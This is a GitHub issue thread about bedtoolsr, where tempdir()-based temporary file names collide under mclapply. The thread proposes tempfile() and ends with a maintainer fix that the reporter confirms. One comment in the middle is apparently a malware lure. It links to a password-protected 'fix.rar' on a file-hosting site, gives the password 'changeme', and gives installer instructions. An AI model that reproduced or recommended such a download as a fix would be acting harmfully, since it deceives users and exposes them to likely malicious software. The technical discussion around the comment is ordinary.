### ISSUE TITLE
Same tempfile name when using mclapply and bedtoolsr

### ISSUE THREAD

**Issue by ppolonen** [PhanstielLab/bedtoolsr#16]
Hi,

If bedtoolsr::bt.intersect is run within mclapply loop and multiple cores, the tempfile for file a, b can get the same name causing a lot of problems.

I think the issue is establishPaths and use of tempdir():
      filepath <- paste0(tempdir(), "/" , name, "_", i, ".txt")
      
Use of tempfile() instead here would be better as far as I understand:

"R processes forked by functions such as mclapply and makeForkCluster in package parallel share a
per-session temporary directory. Further, the ‘guaranteed not to be currently in use’ applies only at the
time of asking, and two children could ask simultaneously. This is circumvented by ensuring that
tempfile calls in different children try different names."

The solution is to use tempfile() instead.

Petri

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cwenger** [comment]
@ppolonen Please give the latest version a try.

**Comment by ppolonen** [comment]
This resolved this issue, thanks for a quick fix.
